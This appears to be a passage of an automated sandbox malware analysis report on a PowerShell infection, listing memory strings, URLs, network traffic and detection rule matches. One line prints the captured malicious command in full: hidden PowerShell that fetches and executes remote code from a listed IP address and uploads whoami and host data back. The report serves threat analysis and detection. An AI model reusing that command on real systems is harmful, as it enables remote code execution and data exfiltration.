Source:
Binary string: ystem.Core.pdbz source: powershell.exe, 0000000E.00000002.3044779615.0000020A42327000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: System.pdbCore.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000E.00000002.2976704530.0000020A2833C000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: *.pdb\ source: powershell.exe, 0000000E.00000002.3043497362.0000020A42291000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: icrosoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
Source:
Binary string: System.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp
String found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument Target"word/document.xml/>
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp
String found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocume
Source: global traffic
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
Source: unknown
TCP traffic detected without corresponding DNS query: 147.78.46.40
Source: global traffic
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B4F2000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662(
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B7BF000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662/xsSpQbS
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B510000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662/xsSpQbSP
Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:37662P
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://147.78.46.40:43891/page164
Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://crl.microsoftK8
Source: svchost.exe, 0000000A.00000002.3430811641.0000023B7188B000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2397944415.0000023E4ABBF000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://schemas.openxmlfo
Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://www.mcrosoft.com
Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B7159E000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2AB3F000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://oneget.orgX
Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 0_2_00007FFD3479394D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD343354A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD3433249D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD34334099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD34333DFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD34333B67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD34336365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD34335B7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code function: 14_2_00007FFD3440091E
Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Mutant created: NULL
Source: C:\Windows\System32\conhost.exe
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03